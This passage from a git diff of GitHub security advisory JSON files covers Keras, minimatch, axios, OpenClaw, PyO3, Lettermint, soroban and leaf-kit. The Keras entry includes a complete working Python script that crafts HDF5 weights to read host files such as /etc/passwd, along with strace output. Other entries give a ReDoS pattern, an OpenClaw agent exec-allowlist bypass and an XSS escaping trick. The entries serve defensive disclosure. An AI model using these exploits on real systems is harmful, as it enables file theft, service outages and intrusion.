retrieves the captured data without needing continued access to the victim environment.\n\n### Additional Preconditions\n\n- The target file must exist and be readable by the process running TensorFlow/Keras.\n- Safe mode (`load_model(..., safe_mode=True)`) does not mitigate the issue because the attack path is weight loading rather than object/lambda deserialization.\n- Environments with strict filesystem permissioning or sandboxing (e.g., container runtime blocking access to `/etc/hostname`) can reduce impact, but common defaults expose a broad set of host files.\n\n## Environment Used for Verification (2025‑10‑19)\n\n- OS: Debian-based container running Python 3.11.\n- Packages (installed via `python -m pip install -U ...`):\n - `tensorflow==2.20.0`\n - `keras==3.11.3`\n - `h5py==3.15.1`\n - `numpy==2.3.4`\n- Tooling: `strace` (for syscall tracing), `pip` upgraded to latest before installs.\n- Debug flags: `PYTHONFAULTHANDLER=1`, `TF_CPP_MIN_LOG_LEVEL=0` during instrumentation to capture verbose logs if needed.\n\n## Reproduction Instructions (Weights-Only PoC)\n\n1. Ensure the environment above (or equivalent) is prepared.\n2. Save the following script as `weights_external_demo.py`:\n\n```python\nfrom __future__ import annotations\nimport os\nfrom pathlib import Path\nimport numpy as np\nimport tensorflow as tf\nimport h5py\n\ndef choose_host_file() -> Path:\n candidates = [\n os.environ.get(\"KFLI_PATH\"),\n \"/etc/machine-id\",\n \"/etc/hostname\",\n \"/proc/sys/kernel/hostname\",\n \"/etc/passwd\",\n ]\n for candidate in candidates:\n if not candidate:\n continue\n path = Path(candidate)\n if path.exists() and path.is_file():\n return path\n raise FileNotFoundError(\"set KFLI_PATH to a readable file\")\n\ndef build_model(units: int) -> tf.keras.Model:\n model = tf.keras.Sequential([\n tf.keras.layers.Input(shape=(1,), name=\"input\"),\n tf.keras.layers.Dense(units, activation=None, use_bias=True, name=\"dense\"),\n ])\n model(tf.zeros((1, 1))) # build weights\n return model\n\ndef find_bias_dataset(h5file: h5py.File) -> str:\n matches: list[str] = []\n def visit(name: str, obj) -> None:\n if isinstance(obj, h5py.Dataset) and name.endswith(\"bias:0\"):\n matches.append(name)\n h5file.visititems(visit)\n if not matches:\n raise RuntimeError(\"bias dataset not found\")\n return matches[0]\n\ndef rewrite_bias_external(path: Path, host_file: Path) -> tuple[int, int]:\n with h5py.File(path, \"r+\") as h5file:\n bias_path = find_bias_dataset(h5file)\n parent = h5file[str(Path(bias_path).parent)]\n dset_name = Path(bias_path).name\n del parent[dset_name]\n max_bytes = 128\n size = host_file.stat().st_size\n nbytes = min(size, max_bytes)\n nbytes = (nbytes // 4) * 4 or 32 # multiple of 4 for float32 packing\n units = max(1, nbytes // 4)\n parent.create_dataset(\n dset_name,\n shape=(units,),\n dtype=\"float32\",\n external=[(host_file.as_posix(), 0, nbytes)],\n )\n return units, nbytes\n\ndef floats_to_ascii(arr: np.ndarray) -> tuple[str, str]:\n raw = np.ascontiguousarray(arr).view(np.uint8)\n ascii_preview = bytes(b if 32 <= b < 127 else 46 for b in raw).decode(\"ascii\", \"ignore\")\n hex_preview = raw[:64].tobytes().hex()\n return ascii_preview, hex_preview\n\ndef main() -> None:\n host_file = choose_host_file()\n model = build_model(units=32)\n\n weights_path = Path(\"weights_demo.h5\")\n model.save_weights(weights_path.as_posix())\n\n units, nbytes = rewrite_bias_external(weights_path, host_file)\n print(\"secret_text_source\", host_file)\n print(\"units\", units, \"bytes_mapped\", nbytes)\n\n model.load_weights(weights_path.as_posix())\n output = model.predict(tf.zeros((1, 1)), verbose=0)[0]\n ascii_preview, hex_preview = floats_to_ascii(output)\n print(\"recovered_ascii\", ascii_preview)\n print(\"recovered_hex64\", hex_preview)\n\n saved = Path(\"weights_demo_resaved.h5\")\n model.save_weights(saved.as_posix())\n print(\"resaved_weights\", saved.as_posix())\n\nif __name__ == \"__main__\":\n main()\n```\n\n3. Execute `python weights_external_demo.py`.\n4. Observe:\n - `secret_text_source` prints the chosen host file path.\n - `recovered_ascii`/`recovered_hex64` display the file contents recovered via model inference.\n - A re-saved weights file contains the leaked bytes inside the artifact.\n\n## Expanded Validation (Multiple Attack Scenarios)\n\nThe following test harness generalises the attack for multiple HDF5 constructs:\n\n- Build a minimal feed-forward model and baseline weights.\n- Create three malicious variants:\n 1. **External storage dataset**: dataset references `/etc/hosts`.\n 2. **External link**: `ExternalLink` pointing at `/etc/passwd`.\n 3. **Indirect link**: external storage referencing a helper HDF5 that, in turn, refers to `/etc/hostname`.\n- Run each scenario under `strace -f -e trace=open,openat,read` while calling `model.load_weights(...)`.\n- Post-process traces and weight tensors to show the exact bytes loaded.\n\nRelevant syscall excerpts captured during the run:\n\n```\nopenat(AT_FDCWD, \"/etc/hosts\", O_RDONLY|O_CLOEXEC) = 7\nread(7, \"127.0.0.1 localhost\\n\", 64) = 21\n...\nopenat(AT_FDCWD, \"/etc/passwd\", O_RDONLY|O_CLOEXEC) = 9\nread(9, \"root:x:0:0:root:/root:/bin/bash\\n\", 64) = 32\n...\nopenat(AT_FDCWD, \"/etc/hostname\", O_RDONLY|O_CLOEXEC) = 8\nread(8, \"example-host\\n\", 64) = 13\n```\n\nThe corresponding model weight bytes (converted to ASCII) mirrored these file contents, confirming successful exfiltration in every case.\n\n## Recommended Product Fix\n\n1. **Default-deny external datasets/links**:\n - Inspect creation property lists (`get_external_count`) before materialising tensors.\n - Resolve `SoftLink` / `ExternalLink` targets and block if they leave the HDF5 file.\n2. **Provide an escape hatch**:\n - Offer an explicit `allow_external_data=True` flag or environment variable for advanced users who truly rely on HDF5 external storage.\n3. **Documentation**:\n - Update security guidance and API docs to clarify that weight loading bypasses safe mode and that external HDF5 references are rejected by default.\n4. **Regression coverage**:\n - Add automated tests mirroring the scenarios above to ensure future refactors do not reintroduce the issue.\n\n## Workarounds\n\n- Avoid loading untrusted HDF5 weight files.\n- Pre-scan weight files using `h5py` to detect external datasets or links before invoking Keras loaders.\n- Prefer alternate formats (e.g., NumPy `.npz`) that lack external reference capabilities when exchanging weights.\n- If isolation is unavoidable, run the load inside a sandboxed environment with limited filesystem access.\n\n## Timeline (UTC)\n\n- **2025‑10‑18**: Initial proof against TensorFlow 2.12.0 confirmed local file disclosure.\n- **2025‑10‑19**: Re-validated on TensorFlow 2.20.0 / Keras 3.11.3 with syscall tracing; produced weight artifacts and JSON summaries for each malicious scenario; implemented `safe_keras_hdf5.py` prototype guard.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "keras" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.13.0" + }, + { + "fixed": "3.13.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "keras" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0" + }, + { + "fixed": "3.12.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/keras-team/keras/security/advisories/GHSA-3m4q-jmj6-r34q" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1669" + }, + { + "type": "WEB", + "url": "https://github.com/keras-team/keras/pull/22057" + }, + { + "type": "WEB", + "url": "https://github.com/keras-team/keras/commit/8a37f9dadd8e23fa4ee3f537eeb6413e75d12553" + }, + { + "type": "PACKAGE", + "url": "https://github.com/keras-team/keras" + }, + { + "type": "WEB", + "url": "https://github.com/keras-team/keras/releases/tag/v3.12.1" + }, + { + "type": "WEB", + "url": "https://github.com/keras-team/keras/releases/tag/v3.13.2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200", + "CWE-73" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T22:41:58Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-3ppc-4f35-3m26/GHSA-3ppc-4f35-3m26.json b/advisories/github-reviewed/2026/02/GHSA-3ppc-4f35-3m26/GHSA-3ppc-4f35-3m26.json new file mode 100644 index 0000000000000..e62b787b379c0 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-3ppc-4f35-3m26/GHSA-3ppc-4f35-3m26.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3ppc-4f35-3m26", + "modified": "2026-02-20T16:52:14Z", + "published": "2026-02-18T22:38:11Z", + "aliases": [ + "CVE-2026-26996" + ], + "summary": "minimatch has a ReDoS via repeated wildcards with non-matching literal in pattern", + "details": "### Summary\n`minimatch` is vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive `*` wildcards followed by a literal character that doesn't appear in the test string. Each `*` compiles to a separate `[^/]*?` regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits.\n\nThe time complexity is O(4^N) where N is the number of `*` characters. With N=15, a single `minimatch()` call takes ~2 seconds. With N=34, it hangs effectively forever.\n\n\n### Details\n_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._\n\n### PoC\nWhen minimatch compiles a glob pattern, each `*` becomes `[^/]*?` in the generated regex. For a pattern like `***************X***`:\n\n```\n/^(?!\\.)[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?X[^/]*?[^/]*?[^/]*?$/\n```\n\nWhen the test string doesn't contain `X`, the regex engine must try every possible way to distribute the characters across all the `[^/]*?` groups before concluding no match exists. With N groups and M characters, this is O(C(N+M, N)) — exponential.\n### Impact\nAny application that passes user-controlled strings to `minimatch()` as the pattern argument is vulnerable to DoS. This includes:\n- File search/filter UIs that accept glob patterns\n- `.gitignore`-style filtering with user-defined rules\n- Build tools that accept glob configuration\n- Any API that exposes glob matching to untrusted input", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "minimatch" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "10.2.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26996" + }, + { + "type": "WEB", + "url": "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5" + }, + { + "type": "PACKAGE", + "url": "https://github.com/isaacs/minimatch" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1333" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T22:38:11Z", + "nvd_published_at": "2026-02-20T03:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-43fc-jf86-j433/GHSA-43fc-jf86-j433.json b/advisories/github-reviewed/2026/02/GHSA-43fc-jf86-j433/GHSA-43fc-jf86-j433.json index a7d9702027908..c42b11fa1c57f 100644 --- a/advisories/github-reviewed/2026/02/GHSA-43fc-jf86-j433/GHSA-43fc-jf86-j433.json +++ b/advisories/github-reviewed/2026/02/GHSA-43fc-jf86-j433/GHSA-43fc-jf86-j433.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-43fc-jf86-j433", - "modified": "2026-02-09T22:39:32Z", + "modified": "2026-02-18T17:15:11Z", "published": "2026-02-09T17:46:14Z", "aliases": [ "CVE-2026-25639" @@ -25,7 +25,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "1.0.0" }, { "fixed": "1.13.5" @@ -36,6 +36,28 @@ "database_specific": { "last_known_affected_version_range": "<= 1.13.4" } + }, + { + "package": { + "ecosystem": "npm", + "name": "axios" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.30.3" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.30.2" + } } ], "references": [ @@ -51,14 +73,26 @@ "type": "WEB", "url": "https://github.com/axios/axios/pull/7369" }, + { + "type": "WEB", + "url": "https://github.com/axios/axios/pull/7388" + }, { "type": "WEB", "url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57" }, + { + "type": "WEB", + "url": "https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e" + }, { "type": "PACKAGE", "url": "https://github.com/axios/axios" }, + { + "type": "WEB", + "url": "https://github.com/axios/axios/releases/tag/v0.30.0" + }, { "type": "WEB", "url": "https://github.com/axios/axios/releases/tag/v1.13.5" diff --git a/advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json b/advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json new file mode 100644 index 0000000000000..3bd8b7d8813d7 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-4564-pvr2-qq4h/GHSA-4564-pvr2-qq4h.json @@ -0,0 +1,81 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4564-pvr2-qq4h", + "modified": "2026-02-23T22:28:27Z", + "published": "2026-02-18T17:39:00Z", + "aliases": [ + "CVE-2026-27487" + ], + "summary": "OpenClaw: Prevent shell injection in macOS keychain credential write", + "details": "## Summary\nOn macOS, the Claude CLI keychain credential refresh path constructed a shell command to write the updated JSON blob into Keychain via `security add-generic-password -w ...`. Because OAuth tokens are user-controlled data, this created an OS command injection risk.\n\nThe fix avoids invoking a shell by using `execFileSync(\"security\", argv)` and passing the updated keychain payload as a literal argument.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Platform: macOS only\n- Affected versions: `<= 2026.2.13`\n\n## Fix\n- Patched version: `>= 2026.2.14` (next release)\n- Fix PR: #15924\n- Fix commits (merged to `main`):\n - `9dce3d8bf83f13c067bc3c32291643d2f1f10a06`\n - `66d7178f2d6f9d60abad35797f97f3e61389b70c`\n - `b908388245764fb3586859f44d1dff5372b19caf`\n\nThanks @aether-ai-agent for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4564-pvr2-qq4h" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27487" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/pull/15924" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/66d7178f2d6f9d60abad35797f97f3e61389b70c" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/9dce3d8bf83f13c067bc3c32291643d2f1f10a06" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/b908388245764fb3586859f44d1dff5372b19caf" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T17:39:00Z", + "nvd_published_at": "2026-02-21T10:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-4685-c5cp-vp95/GHSA-4685-c5cp-vp95.json b/advisories/github-reviewed/2026/02/GHSA-4685-c5cp-vp95/GHSA-4685-c5cp-vp95.json new file mode 100644 index 0000000000000..2a8327c2369ec --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-4685-c5cp-vp95/GHSA-4685-c5cp-vp95.json @@ -0,0 +1,63 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4685-c5cp-vp95", + "modified": "2026-02-19T22:06:00Z", + "published": "2026-02-19T22:06:00Z", + "aliases": [], + "summary": "OpenClaw safeBins stdin-only bypass via sort output and recursive grep flags", + "details": "## Summary\n`tools.exec.safeBins` could be bypassed for filesystem access when `sort` output flags (`-o` / `--output`) or recursive `grep` flags were allowed through safe-bin execution paths.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.2.17`\n- Patched versions: `>= 2026.2.19`\n- Latest published version at triage time: `2026.2.17`\n\n## Impact\nIn deployments that enabled `tools.exec.safeBins`, an attacker with access to command execution flows could turn intended stdin-only safe-bin usage into file writes (`sort -o`) or recursive file reads (`grep -R`).\n\n## Fix Commit(s)\n- `cfe8457a0f4aae5324daec261d3b0aad1461a4bc`\n\nThanks @nedlir for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.19" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2026.2.17" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4685-c5cp-vp95" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/cfe8457a0f4aae5324daec261d3b0aad1461a4bc" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-184", + "CWE-78" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2026-02-19T22:06:00Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-47qc-857f-7w7f/GHSA-47qc-857f-7w7f.json b/advisories/github-reviewed/2026/02/GHSA-47qc-857f-7w7f/GHSA-47qc-857f-7w7f.json new file mode 100644 index 0000000000000..c657392d110ca --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-47qc-857f-7w7f/GHSA-47qc-857f-7w7f.json @@ -0,0 +1,67 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-47qc-857f-7w7f", + "modified": "2026-02-19T20:25:46Z", + "published": "2026-02-19T20:25:46Z", + "aliases": [], + "summary": "PyO3 has type confusion when accessing data from sublasses of subclasses of native types with `abi3` feature", + "details": "PyO3 0.28.1 added support for `#[pyclass(extends=PyList)] struct NativeSub` (and other native types) when targeting Python 3.12 and up with the `abi3` feature.\n\nIt was discovered that subclasses of such classes would use the type of the subclass when attempting to access to data of `NativeSub` contained within Python objects, amounting to memory corruption.\n\nPyO3 0.28.2 fixed the issue by using the type of (e.g.) `NativeSub` correctly.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U" + } + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "pyo3" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.28.0" + }, + { + "fixed": "0.28.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/PyO3/pyo3/pull/5807#issuecomment-3913251784" + }, + { + "type": "WEB", + "url": "https://github.com/PyO3/pyo3/commit/75abd8602896b350fd8c778e52e0a74b4644ccca" + }, + { + "type": "PACKAGE", + "url": "https://github.com/PyO3/pyo3" + }, + { + "type": "WEB", + "url": "https://github.com/PyO3/pyo3/releases/tag/v0.28.2" + }, + { + "type": "WEB", + "url": "https://rustsec.org/advisories/RUSTSEC-2026-0013.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-843" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-19T20:25:46Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-49pc-8936-wvfp/GHSA-49pc-8936-wvfp.json b/advisories/github-reviewed/2026/02/GHSA-49pc-8936-wvfp/GHSA-49pc-8936-wvfp.json new file mode 100644 index 0000000000000..3e50474af8813 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-49pc-8936-wvfp/GHSA-49pc-8936-wvfp.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-49pc-8936-wvfp", + "modified": "2026-02-23T22:30:18Z", + "published": "2026-02-20T21:14:49Z", + "aliases": [ + "CVE-2026-27492" + ], + "summary": "Lettermint Node.js SDK leaks email properties to unintended recipients when client instance is reused", + "details": "### Impact\nEmail properties (such as to, subject, html, text, and attachments) are not reset between sends when a single client instance is reused across multiple .send() calls. This can cause properties from a previous send to leak into a subsequent one, potentially delivering content or recipient addresses to unintended parties. Applications sending emails to different recipients in sequence — such as transactional flows like password resets or notifications — are affected.\n\n### Patches\nYes, the issue has been patched. Users should upgrade to v1.5.1 or later.\n\n### Workarounds\nIf upgrading immediately is not possible, instantiate a new client for each send:\n```js\nconst client = new Lettermint({ apiKey: process.env.LETTERMINT_API_KEY });\nawait client.email.to('...').subject('...').html('...').send();\n```\n\nThis ensures no state is carried over between sends.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "lettermint" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.5.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/lettermint/lettermint-node/security/advisories/GHSA-49pc-8936-wvfp" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27492" + }, + { + "type": "WEB", + "url": "https://github.com/lettermint/lettermint-node/commit/24a17acbc2429c5eb30391f9df3dc0ea7aaf4de1" + }, + { + "type": "PACKAGE", + "url": "https://github.com/lettermint/lettermint-node" + }, + { + "type": "WEB", + "url": "https://github.com/lettermint/lettermint-node/blob/main/CHANGELOG.md#151-2026-02-20" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-488" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-20T21:14:49Z", + "nvd_published_at": "2026-02-21T11:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-4chv-4c6w-w254/GHSA-4chv-4c6w-w254.json b/advisories/github-reviewed/2026/02/GHSA-4chv-4c6w-w254/GHSA-4chv-4c6w-w254.json new file mode 100644 index 0000000000000..b1103d27602d6 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-4chv-4c6w-w254/GHSA-4chv-4c6w-w254.json @@ -0,0 +1,124 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4chv-4c6w-w254", + "modified": "2026-02-19T21:56:47Z", + "published": "2026-02-17T21:29:05Z", + "aliases": [ + "CVE-2026-26267" + ], + "summary": "The rs-soroban-sdk #[contractimpl] macro calls inherent function instead of trait function when names collide", + "details": "### Impact\n\nThe `#[contractimpl]` macro contains a bug in how it wires up function calls.\n\nIn Rust, you can define functions on a type in two ways:\n- Directly on the type as an inherent function:\n ```rust\n impl MyContract {\n fn value() { ... }\n }\n ```\n- Through a trait\n ```rust\n impl Trait for MyContract {\n fn value() { ... }\n }\n ```\n\nThese are two separate functions that happen to share the same name. Rust has rules for which one gets called. When you write `MyContract::value()`, Rust always picks the one defined directly on the type, not the trait version.\n\nThe bug is that `#[contractimpl]` generates code that uses `MyContract::value()` style calls even when it's processing the trait version. This means if an inherent function is also defined with the same name, the inherent function gets called instead of the trait function.\n\nThis means the Wasm-exported entry point silently calls the wrong function when two conditions are met simultaneously:\n1. A `impl Trait for MyContract` block is defined with one or more functions, with `#[contractimpl]` applied.\n2. A `impl MyContract` block is defined with one or more identically named functions, without `#[contractimpl]` applied.\n\nIf the trait version contains important security checks, such as verifying the caller is authorized, that the inherent version does not, those checks are bypassed. Anyone interacting with the contract through its public interface will call the wrong function.\n\nFor example:\n\n```rust\n#[contract]\npub struct Contract;\n\nimpl Contract {\n /// Inherent function — returns 1.\n /// Bug: The macro-generated WASM export is wired up to call this function.\n pub fn value() -> u32 {\n 1\n }\n}\n\npub trait Trait {\n fn value(env: Env) -> u32;\n}\n\n#[contractimpl]\nimpl Trait for MyContract {\n /// Trait implementation — returns 2.\n /// Fix: The macro-generated WASM export should call this function.\n fn value() -> u32 {\n 2\n }\n}\n```\n\n### Patches\n\nThe problem is patched in `soroban-sdk-macros` version **25.1.1**. The fix changes the generated call from `::func()` to `::func()` when processing trait implementations, ensuring Rust resolves to the trait associated function regardless of whether an inherent function with the same name exists.\n\nUsers should upgrade to `soroban-sdk-macros` **>= 25.1.1** and recompile their contracts.\n\n### Workarounds\n\nIf upgrading is not immediately possible, contract developers can avoid the issue by ensuring that no inherent associated function on the contract type shares a name with any function in the trait implementation. Renaming or removing the conflicting inherent function eliminates the ambiguity and causes the macro-generated code to correctly resolve to the trait function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "soroban-sdk-macros" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "25.0.0" + }, + { + "fixed": "25.1.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 25.1.0" + } + }, + { + "package": { + "ecosystem": "crates.io", + "name": "soroban-sdk-macros" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "23.0.0" + }, + { + "fixed": "23.5.2" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 23.5.1" + } + }, + { + "package": { + "ecosystem": "crates.io", + "name": "soroban-sdk-macros" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "22.0.10" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 22.0.9" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/stellar/rs-soroban-sdk/security/advisories/GHSA-4chv-4c6w-w254" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26267" + }, + { + "type": "WEB", + "url": "https://github.com/stellar/rs-soroban-sdk/pull/1729" + }, + { + "type": "WEB", + "url": "https://github.com/stellar/rs-soroban-sdk/pull/1730" + }, + { + "type": "WEB", + "url": "https://github.com/stellar/rs-soroban-sdk/pull/1731" + }, + { + "type": "WEB", + "url": "https://github.com/stellar/rs-soroban-sdk/commit/e92a3933e5f92dc09da3c740cf6a360d55709a2b" + }, + { + "type": "PACKAGE", + "url": "https://github.com/stellar/rs-soroban-sdk" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-670" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T21:29:05Z", + "nvd_published_at": "2026-02-19T20:25:43Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-4hfh-fch3-5q7p/GHSA-4hfh-fch3-5q7p.json b/advisories/github-reviewed/2026/02/GHSA-4hfh-fch3-5q7p/GHSA-4hfh-fch3-5q7p.json new file mode 100644 index 0000000000000..a079fd9c57ac1 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-4hfh-fch3-5q7p/GHSA-4hfh-fch3-5q7p.json @@ -0,0 +1,67 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4hfh-fch3-5q7p", + "modified": "2026-02-23T22:21:47Z", + "published": "2026-02-19T19:40:08Z", + "aliases": [ + "CVE-2026-27120" + ], + "summary": "Leaf-kit html escaping does not work on characters that are part of extended grapheme cluster", + "details": "### Summary\n\n`htmlEscaped` in leaf-kit will only escape html special characters if the extended grapheme clusters match, which allows bypassing escaping by using an extended grapheme cluster containing both the special html character and some additional characters. In the case of html attributes, this can lead to XSS if there is a leaf variable in the attribute that is user controlled.\n\n### Details\n\nRelevant code:\nhttps://github.com/vapor/leaf-kit/blob/main/Sources/LeafKit/String%2BHTMLEscape.swift#L14\n\nStrings in Swift are based on extended grapheme clusters. HTML on the other hand is based on unicode characters. \n\nFor example if you have the sequence \"́ (U+0022 Quotation mark followed by U+0301 Combining Acute Accent). To HTML this is just a quote mark followed by some other random character. To swift this is one extended grapheme cluster that does not equal a quotation mark by itself which is a different extended grapheme cluster.\n\nThus `\"\\\"́\".replacingOccurrences(of: \"\\\"\", with: \""\")` does not replace the quote mark. This allows you to break out of html attributes.\n\nI believe replacingOccurences takes an optional third parameter that allows you to specify options to make it work on UTF-8 characters instead of grapheme clusters, which would be a good fix for this issue.\n\nI see depending on version, leafkit might use `replacing` instead of `replacingOccurences`. I don't know swift that well and couldn't find docs on what replacing does, so I don't know if both versions of the function are affected. The version of swift i was testing on I believe was using replacingOccurences\n\nIt seems like replacingOccurences will skip past prefix characters of extended grapheme clusters, which is what would be needed in order to meaningfully bypass esaping of <. Thus i think this is mostly limited to attributes and not general text.\n\n### PoC\n\nAn example vapor application that is vulnerable might look like\n\nroutes.swift\n```swift\nimport Vapor\n\nstruct Hello: Content {\n var msg: String?\n}\n\nfunc routes(_ app: Application) throws {\n app.post { req throws in\n\tlet Hello = try req.content.decode(Hello.self)\n return req.view.render(\"hello\", 